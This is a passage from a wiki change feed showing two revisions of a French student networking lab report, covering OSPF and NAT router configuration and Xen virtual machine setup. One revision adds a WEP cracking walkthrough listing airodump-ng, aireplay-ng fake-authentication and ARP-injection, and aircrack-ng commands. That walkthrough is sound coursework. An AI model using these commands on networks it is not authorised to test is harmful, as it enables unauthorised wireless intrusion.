L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages.&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un '''ping''' vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
=Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
* Création de la machine virtuelle&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image...&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
** On riquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM: /etc/xen/trompettedelamort.cfg&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.16, ...']&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==Cassage de clef WEP d’un point d’accès WiFi==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=52884</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=52884"/>
				<updated>2020-10-31T12:59:28Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
--------------------&lt;br /&gt;
 Hostname              : trompettedelamort&lt;br /&gt;
 Distribution          : buster&lt;br /&gt;
 IP (non routée)       : 100.64.0.17&lt;br /&gt;
 IP (natée)            : 193.48.57.176&lt;br /&gt;
 Netmask               : 255.255.255.240&lt;br /&gt;
 Gateway               : 100.64.0.5&lt;br /&gt;
 IP Routeur1           : 100.64.0.5&lt;br /&gt;
 IP Routeur1           : 100.64.0.6&lt;br /&gt;
 IP commune routeurs   : 100.64.0.7&lt;br /&gt;
 VLAN                  : 316&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==Architecture générale==&lt;br /&gt;
Réalisé par le groupe 4 et 14.&lt;br /&gt;
&lt;br /&gt;
==Les réseaux virtuels==&lt;br /&gt;
Réalisé par le groupe 14... merci Guillaume&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec Internet (IPv4)==&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages.&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un '''ping''' vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
=Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
* Création de la machine virtuelle&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image...&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
** On riquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM: /etc/xen/trompettedelamort.cfg&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.16, ...']&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
==Réalisations==&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	</feed>